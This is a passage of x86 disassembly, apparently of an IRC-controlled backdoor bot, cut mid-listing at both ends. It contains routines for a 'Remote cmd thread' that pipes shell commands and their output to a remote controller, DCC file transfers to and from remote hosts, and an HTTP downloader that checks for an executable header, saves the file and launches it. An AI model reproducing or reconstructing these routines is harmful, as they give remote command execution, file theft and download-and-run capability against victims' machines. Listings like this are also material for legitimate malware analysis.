push 0
lea eax, [ebp+var_31C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_204]
push eax
push dword_41DE24
call dword_417088 ; ReadFile
test eax, eax
jnz short loc_401D08
jmp short loc_401D22
; ---------------------------------------------------------------------------
loc_401D08: ; CODE XREF: sub_401981+383�j
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_510]
push eax
call sub_4018AF
pop ecx
pop ecx
jmp loc_401BAD
; ---------------------------------------------------------------------------
loc_401D22: ; CODE XREF: sub_401981+238�j
; sub_401981+291�j ...
call sub_401856
push [ebp+var_714]
call sub_409763
pop ecx
xor eax, eax
locret_401D35: ; CODE XREF: sub_401981+67�j
; sub_401981+BB�j ...
leave
retn 4
sub_401981 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D39 proc near ; CODE XREF: sub_401D6E+AF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_4]
push [ebp+arg_0]
push dword_41DE20
call dword_417068 ; WriteFile
test eax, eax
jnz short loc_401D69
xor eax, eax
jmp short locret_401D6C
; ---------------------------------------------------------------------------
loc_401D69: ; CODE XREF: sub_401D39+2A�j
push 1
pop eax
locret_401D6C: ; CODE XREF: sub_401D39+2E�j
leave
retn
sub_401D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D6E proc near ; CODE XREF: sub_40A9CF+14A0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_401DA6
cmp [ebp+arg_4], 0
jnz short loc_401D8B
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401D8B: ; CODE XREF: sub_401D6E+16�j
push 0
push 0
push 0
push [ebp+arg_4]
push offset aOpen ; "open"
push 0
call dword_4171D0
jmp locret_401E36
; ---------------------------------------------------------------------------
loc_401DA6: ; CODE XREF: sub_401D6E+10�j
push 3A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_401DBC
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401DBC: ; CODE XREF: sub_401D6E+4A�j
cmp [ebp+arg_4], 0
jz short loc_401DD9
push 200h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
loc_401DD9: ; CODE XREF: sub_401D6E+52�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 204h
push eax
call sub_405F67
pop ecx
pop ecx
push offset aRemoteCmdThrea ; "Remote cmd thread"
push 1
push [ebp+var_4]
push offset sub_401981
call sub_4095A4
add esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_401E0B
jmp short locret_401E36
; ---------------------------------------------------------------------------
loc_401E0B: ; CODE XREF: sub_401D6E+99�j
push offset asc_418214 ; "\r\n"
push [ebp+arg_4]
call sub_416B70 ; strcat
pop ecx
pop ecx
push [ebp+arg_4]
call sub_401D39
pop ecx
test eax, eax
jnz short locret_401E36
push offset aErrorWhileExec ; "Error while executing command."
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
locret_401E36: ; CODE XREF: sub_401D6E+18�j
; sub_401D6E+33�j ...
leave
retn
sub_401D6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E38 proc near ; DATA XREF: sub_4024F3+10B�o
var_614 = qword ptr -614h
var_60C = qword ptr -60Ch
var_604 = dword ptr -604h
var_600 = dword ptr -600h
var_5FC = dword ptr -5FCh
var_5F8 = dword ptr -5F8h
var_5F4 = dword ptr -5F4h
var_5F0 = dword ptr -5F0h
var_5EC = dword ptr -5ECh
var_5E8 = dword ptr -5E8h
var_5E4 = dword ptr -5E4h
var_5E0 = dword ptr -5E0h
var_5DC = byte ptr -5DCh
var_5BB = byte ptr -5BBh
var_4B7 = byte ptr -4B7h
var_3B7 = byte ptr -3B7h
var_3AD = byte ptr -3ADh
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 604h
push 3D6h
push [ebp+arg_0]
lea eax, [ebp+var_5E0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_5BB]
push eax
call dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_5BB]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_5E4], eax
cmp [ebp+var_5E4], 0
jnz short loc_401EA3
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EA3: ; CODE XREF: sub_401E38+56�j
push 2710h
push 0
lea eax, [ebp+var_3B7]
push eax
lea eax, [ebp+var_4B7]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_401EEE
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4020BE
; ---------------------------------------------------------------------------
loc_401EEE: ; CODE XREF: sub_401E38+95�j
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
mov eax, [ebp+var_5E0]
push dword ptr [eax]
push offset dword_418280
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_5E8], eax
and [ebp+var_204], 0
loc_401F2A: ; CODE XREF: sub_401E38:loc_401FD8�j
push 0
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+var_208]
call dword_417248 ; recv
mov [ebp+var_5F0], eax
cmp [ebp+var_5F0], 0
jz short loc_401F5F
cmp [ebp+var_5F0], 200h
jbe short loc_401F61
loc_401F5F: ; CODE XREF: sub_401E38+119�j
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401F61: ; CODE XREF: sub_401E38+125�j
mov eax, [ebp+var_204]
add eax, [ebp+var_5F0]
mov [ebp+var_204], eax
push [ebp+var_204]
call dword_41724C ; ntohl
mov [ebp+var_5F4], eax
push 4
lea eax, [ebp+var_5F4]
push eax
push [ebp+var_208]
call sub_4053BF
add esp, 0Ch
push [ebp+var_5E4]
push [ebp+var_5F0]
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B7C ; fwrite
add esp, 10h
cmp [ebp+var_5F0], 200h
jnb short loc_401FC7
jmp short loc_401FDD
; ---------------------------------------------------------------------------
loc_401FC7: ; CODE XREF: sub_401E38+18B�j
mov eax, [ebp+var_5E0]
cmp dword ptr [eax+4], 0
jz short loc_401FD8
jmp loc_4020BC
; ---------------------------------------------------------------------------
loc_401FD8: ; CODE XREF: sub_401E38+199�j
jmp loc_401F2A
; ---------------------------------------------------------------------------
loc_401FDD: ; CODE XREF: sub_401E38:loc_401F5F�j
; sub_401E38+18D�j
push [ebp+var_5E4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_5EC], eax
call sub_416B64 ; clock
cmp [ebp+var_5E8], eax
jnz short loc_402008
call sub_416B64 ; clock
dec eax
mov [ebp+var_5E8], eax
loc_402008: ; CODE XREF: sub_401E38+1C2�j
mov eax, [ebp+var_5EC]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_5F8], eax
fild [ebp+var_5F8]
fstp [ebp+var_5FC]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_600], eax
fild [ebp+var_600]
fdiv flt_417270
fdivr [ebp+var_5FC]
push ecx
push ecx
fstp [esp+60Ch+var_60C]
call sub_416B64 ; clock
sub eax, [ebp+var_5E8]
mov [ebp+var_604], eax
fild [ebp+var_604]
fdiv flt_417270
push ecx
push ecx
fstp [esp+614h+var_614]
lea eax, [ebp+var_5DC]
push eax
lea eax, [ebp+var_5BB]
push eax
push offset dword_418234
lea eax, [ebp+var_3AD]
push eax
call sub_40D53F
add esp, 20h
loc_402094: ; CODE XREF: sub_401E38:loc_4020BC�j
push [ebp+var_5E4]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_208]
call sub_40538D
pop ecx
push [ebp+var_5E0]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4020BE
; ---------------------------------------------------------------------------
loc_4020BC: ; CODE XREF: sub_401E38+19B�j
jmp short loc_402094
; ---------------------------------------------------------------------------
locret_4020BE: ; CODE XREF: sub_401E38+66�j
; sub_401E38+B1�j ...
leave
retn 4
sub_401E38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020C2 proc near ; DATA XREF: sub_40260D+7C�o
var_A2C = qword ptr -0A2Ch
var_A24 = qword ptr -0A24h
var_A1C = dword ptr -0A1Ch
var_A18 = dword ptr -0A18h
var_A14 = dword ptr -0A14h
var_A10 = dword ptr -0A10h
var_A0C = dword ptr -0A0Ch
var_A08 = dword ptr -0A08h
var_A04 = byte ptr -0A04h
var_9FC = dword ptr -9FCh
var_9F8 = dword ptr -9F8h
var_9F4 = dword ptr -9F4h
var_9F0 = byte ptr -9F0h
var_8EC = dword ptr -8ECh
var_8E8 = dword ptr -8E8h
var_8E4 = dword ptr -8E4h
var_8E0 = byte ptr -8E0h
var_8BF = byte ptr -8BFh
var_8BE = byte ptr -8BEh
var_7BB = byte ptr -7BBh
var_618 = dword ptr -618h
var_614 = byte ptr -614h
var_210 = byte ptr -210h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A1Ch
push 2CCh
push [ebp+arg_0]
lea eax, [ebp+var_8E4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_8BF]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_9F8], eax
jmp short loc_40210D
; ---------------------------------------------------------------------------
loc_402100: ; CODE XREF: sub_4020C2:loc_40215E�j
mov eax, [ebp+var_9F8]
dec eax
mov [ebp+var_9F8], eax
loc_40210D: ; CODE XREF: sub_4020C2+3C�j
cmp [ebp+var_9F8], 0
jnz short loc_40212D
lea eax, [ebp+var_8BF]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40212D: ; CODE XREF: sub_4020C2+52�j
mov eax, [ebp+var_9F8]
movsx eax, [ebp+eax+var_8BF]
cmp eax, 5Ch
jnz short loc_40215E
mov eax, [ebp+var_9F8]
lea eax, [ebp+eax+var_8BE]
push eax
lea eax, [ebp+var_9F0]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_402160
; ---------------------------------------------------------------------------
loc_40215E: ; CODE XREF: sub_4020C2+7C�j
jmp short loc_402100
; ---------------------------------------------------------------------------
loc_402160: ; CODE XREF: sub_4020C2+69�j
; sub_4020C2+9A�j
mov [ebp+var_8E8], 10h
lea eax, [ebp+var_8E8]
push eax
lea eax, [ebp+var_10]
push eax
call sub_40CF25
push eax
call dword_417240 ; getsockname
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_614]
push eax
push [ebp+var_8E8]
lea eax, [ebp+var_10]
push eax
call dword_41DE88 ; getnameinfo
test eax, eax
jz short loc_4021BA
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_4021BA: ; CODE XREF: sub_4020C2+E3�j
push 0Ah
lea eax, [ebp+var_A04]
push eax
push 1388h
push 400h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
lea eax, [ebp+var_A04]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_9FC], eax
cmp [ebp+var_9FC], 0
jnz short loc_40220F
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40220F: ; CODE XREF: sub_4020C2+138�j
push offset aRb ; "rb"
lea eax, [ebp+var_8BF]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8EC], eax
cmp [ebp+var_8EC], 0
jnz short loc_402250
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_402250: ; CODE XREF: sub_4020C2+16D�j
push 2
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_8EC]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_A08], eax
push 0
push 0
push [ebp+var_8EC]
call sub_416B96 ; fseek
add esp, 0Ch
lea eax, [ebp+var_614]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset aDccSendSS ; "DCC Send %s (%s)"
lea eax, [ebp+var_8E0]
push eax
call sub_40D420
add esp, 10h
push [ebp+var_A08]
lea eax, [ebp+var_A04]
push eax
lea eax, [ebp+var_614]
push eax
call dword_417244 ; inet_addr
push eax
call dword_41724C ; ntohl
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_418348
lea eax, [ebp+var_8E0]
push eax
call sub_40D4AB
add esp, 18h
push 0EA60h
push [ebp+var_9FC]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_618], eax
cmp [ebp+var_618], 0
jz short loc_40230F
cmp [ebp+var_618], 0FFFFFFFFh
jnz short loc_40233A
loc_40230F: ; CODE XREF: sub_4020C2+242�j
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4024EF
; ---------------------------------------------------------------------------
loc_40233A: ; CODE XREF: sub_4020C2+24B�j
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
mov eax, [ebp+var_8E4]
push dword ptr [eax]
push offset dword_418320
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 14h
call sub_416B64 ; clock
mov [ebp+var_9F4], eax
loc_40236F: ; CODE XREF: sub_4020C2:loc_40240D�j
push [ebp+var_8EC]
push 200h
push 1
lea eax, [ebp+var_210]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_A0C], eax
cmp [ebp+var_A0C], 0
jz short loc_4023A6
cmp [ebp+var_A0C], 200h
jbe short loc_4023A8
loc_4023A6: ; CODE XREF: sub_4020C2+2D6�j
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023A8: ; CODE XREF: sub_4020C2+2E2�j
push [ebp+var_A0C]
lea eax, [ebp+var_210]
push eax
push [ebp+var_618]
call sub_4053BF
add esp, 0Ch
test eax, eax
jnz short loc_4023EE
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182F4
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 10h
jmp loc_4024ED
; ---------------------------------------------------------------------------
loc_4023EE: ; CODE XREF: sub_4020C2+303�j
cmp [ebp+var_A0C], 200h
jnb short loc_4023FC
jmp short loc_402412
; ---------------------------------------------------------------------------
loc_4023FC: ; CODE XREF: sub_4020C2+336�j
mov eax, [ebp+var_8E4]
cmp dword ptr [eax+4], 0
jz short loc_40240D
jmp loc_4024EB
; ---------------------------------------------------------------------------
loc_40240D: ; CODE XREF: sub_4020C2+344�j
jmp loc_40236F
; ---------------------------------------------------------------------------
loc_402412: ; CODE XREF: sub_4020C2:loc_4023A6�j
; sub_4020C2+338�j
call sub_416B64 ; clock
cmp [ebp+var_9F4], eax
jnz short loc_40242B
call sub_416B64 ; clock
dec eax
mov [ebp+var_9F4], eax
loc_40242B: ; CODE XREF: sub_4020C2+35B�j
mov eax, [ebp+var_A08]
cdq
mov ecx, 400h
idiv ecx
mov [ebp+var_A10], eax
fild [ebp+var_A10]
fstp [ebp+var_A14]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A18], eax
fild [ebp+var_A18]
fdiv flt_417270
fdivr [ebp+var_A14]
push ecx
push ecx
fstp [esp+0A24h+var_A24]
call sub_416B64 ; clock
sub eax, [ebp+var_9F4]
mov [ebp+var_A1C], eax
fild [ebp+var_A1C]
fdiv flt_417270
push ecx
push ecx
fstp [esp+0A2Ch+var_A2C]
lea eax, [ebp+var_8E0]
push eax
lea eax, [ebp+var_9F0]
push eax
push offset dword_4182B0
lea eax, [ebp+var_7BB]
push eax
call sub_40D53F
add esp, 20h
loc_4024B7: ; CODE XREF: sub_4020C2:loc_4024EB�j
; sub_4020C2:loc_4024ED�j
push [ebp+var_618]
call sub_40538D
pop ecx
push [ebp+var_8EC]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_9FC]
call sub_404CBB
pop ecx
push [ebp+var_8E4]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_4024EF
; ---------------------------------------------------------------------------
loc_4024EB: ; CODE XREF: sub_4020C2+346�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
loc_4024ED: ; CODE XREF: sub_4020C2+327�j
jmp short loc_4024B7
; ---------------------------------------------------------------------------
locret_4024EF: ; CODE XREF: sub_4020C2+F3�j
; sub_4020C2+148�j ...
leave
retn 4
sub_4020C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F3 proc near ; CODE XREF: sub_40D871+203�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_402511
cmp [ebp+arg_8], 0
jz short loc_402511
cmp [ebp+arg_C], 0
jz short loc_402511
cmp [ebp+arg_10], 0
jnz short loc_402516
loc_402511: ; CODE XREF: sub_4024F3+A�j
; sub_4024F3+10�j ...
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402516: ; CODE XREF: sub_4024F3+1C�j
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_402531
cmp [ebp+var_8], 0FFFFh
jbe short loc_402536
loc_402531: ; CODE XREF: sub_4024F3+33�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402536: ; CODE XREF: sub_4024F3+3C�j
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_402551
cmp [ebp+var_8], 40000000h
jbe short loc_402556
loc_402551: ; CODE XREF: sub_4024F3+53�j
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_402556: ; CODE XREF: sub_4024F3+5C�j
push 3D6h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40256F
jmp locret_40260B
; ---------------------------------------------------------------------------
loc_40256F: ; CODE XREF: sub_4024F3+75�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 100h
push [ebp+arg_C]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 6
push [ebp+arg_10]
mov eax, [ebp+var_4]
add eax, 229h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+22Fh], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 233h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_41837C
push 0
push [ebp+var_4]
push offset sub_401E38
call sub_4095A4
add esp, 18h
locret_40260B: ; CODE XREF: sub_4024F3:loc_402511�j
; sub_4024F3:loc_402531�j ...
leave
retn
sub_4024F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40260D proc near ; CODE XREF: sub_40A9CF+98E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jz short loc_40261D
cmp [ebp+arg_8], 0
jnz short loc_40261F
loc_40261D: ; CODE XREF: sub_40260D+8�j
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_40261F: ; CODE XREF: sub_40260D+E�j
push 2CCh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_402635
jmp short locret_402696
; ---------------------------------------------------------------------------
loc_402635: ; CODE XREF: sub_40260D+24�j
push 21h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 104h
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 25h
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 129h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_8]
push offset dword_4183A0
push 0
push [ebp+var_4]
push offset sub_4020C2
call sub_4095A4
add esp, 18h
locret_402696: ; CODE XREF: sub_40260D:loc_40261D�j
; sub_40260D+26�j
leave
retn
sub_40260D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402698 proc near ; CODE XREF: sub_402A32+5C9�p
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 420h
push 2710h
push 0
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_414], eax
cmp [ebp+var_414], 0
jnz short loc_4026CC
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4026CC: ; CODE XREF: sub_402698+2B�j
push [ebp+arg_8]
push [ebp+arg_10]
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 401h
lea eax, [ebp+var_404]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_404]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_4053BF
add esp, 0Ch
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402745
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_402758
loc_402745: ; CODE XREF: sub_402698+A2�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_402758: ; CODE XREF: sub_402698+AB�j
push offset asc_4183EC ; "\r\n\r\n"
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_410], eax
cmp [ebp+var_410], 0
jnz short loc_40278D
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40278D: ; CODE XREF: sub_402698+E0�j
mov eax, [ebp+var_410]
add eax, 4
mov [ebp+var_410], eax
push offset aContentLength ; "Content-Length: "
lea eax, [ebp+var_404]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_40C], eax
cmp [ebp+var_40C], 0
jz short loc_4027CC
mov eax, [ebp+var_40C]
cmp eax, [ebp+var_410]
jbe short loc_4027DF
loc_4027CC: ; CODE XREF: sub_402698+124�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4027DF: ; CODE XREF: sub_402698+132�j
and [ebp+var_41C], 0
lea eax, [ebp+var_41C]
push eax
push offset aContentLengthU ; "Content-Length: %u\r\n"
push [ebp+var_40C]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_408], eax
cmp [ebp+var_408], 1
jnz short loc_402818
cmp [ebp+var_41C], 0
jnz short loc_40282B
loc_402818: ; CODE XREF: sub_402698+175�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40282B: ; CODE XREF: sub_402698+17E�j
cmp [ebp+arg_1C], 0
jz short loc_40285D
cmp [ebp+var_41C], 2
jb short loc_40284A
mov eax, [ebp+var_410]
movzx eax, word ptr [eax]
cmp eax, 5A4Dh
jz short loc_40285D
loc_40284A: ; CODE XREF: sub_402698+1A0�j
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40285D: ; CODE XREF: sub_402698+197�j
; sub_402698+1B0�j
cmp [ebp+arg_18], 0
jz short loc_40286E
mov eax, [ebp+arg_18]
mov ecx, [ebp+var_41C]
mov [eax], ecx
loc_40286E: ; CODE XREF: sub_402698+1C9�j
push [ebp+arg_14]
call sub_4167B9
pop ecx
test eax, eax
jz short loc_40288E
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40288E: ; CODE XREF: sub_402698+1E1�j
push offset dword_4182AC
push [ebp+arg_14]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 0
jnz short loc_4028BF
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_4028BF: ; CODE XREF: sub_402698+212�j
push [ebp+var_418]
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
push ecx
push 1
push [ebp+var_410]
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_410]
lea ecx, [ebp+var_404]
sub eax, ecx
mov ecx, [ebp+var_420]
sub ecx, eax
mov eax, [ebp+var_41C]
sub eax, ecx
mov [ebp+var_41C], eax
loc_402910: ; CODE XREF: sub_402698:loc_402A1D�j
cmp [ebp+arg_20], 0
jz short loc_40293F
mov eax, [ebp+arg_20]
cmp dword ptr [eax+4], 0
jz short loc_40293F
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40293F: ; CODE XREF: sub_402698+27C�j
; sub_402698+285�j
push 2710h
push 401h
lea eax, [ebp+var_404]
push eax
push [ebp+var_414]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_402976
cmp [ebp+var_420], 0FFFFFFFFh
jnz short loc_40299E
loc_402976: ; CODE XREF: sub_402698+2D3�j
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push [ebp+arg_14]
call dword_4170AC ; DeleteFileA
xor eax, eax
jmp locret_402A22
; ---------------------------------------------------------------------------
loc_40299E: ; CODE XREF: sub_402698+2DC�j
mov eax, [ebp+var_420]
cmp eax, [ebp+var_41C]
jbe short loc_4029C8
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
xor eax, eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_4029C8: ; CODE XREF: sub_402698+312�j
push [ebp+var_418]
push [ebp+var_420]
push 1
lea eax, [ebp+var_404]
push eax
call sub_416B7C ; fwrite
add esp, 10h
mov eax, [ebp+var_41C]
sub eax, [ebp+var_420]
mov [ebp+var_41C], eax
cmp [ebp+var_41C], 0
jnz short loc_402A1D
push [ebp+var_418]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_414]
call sub_40538D
pop ecx
push 1
pop eax
jmp short locret_402A22
; ---------------------------------------------------------------------------
loc_402A1D: ; CODE XREF: sub_402698+366�j
jmp loc_402910
; ---------------------------------------------------------------------------
locret_402A22: ; CODE XREF: sub_402698+2F�j
; sub_402698+BB�j ...
leave
retn
sub_402698 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A24 proc near ; CODE XREF: sub_402A32+625�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A2B proc near ; CODE XREF: sub_402A32+673�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_402A2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A32 proc near ; DATA XREF: sub_403260+BC�o
var_814 = qword ptr -814h
var_804 = qword ptr -804h
var_7FC = dword ptr -7FCh
var_7F8 = qword ptr -7F8h
var_7F0 = dword ptr -7F0h
var_7EC = dword ptr -7ECh
var_7E8 = dword ptr -7E8h
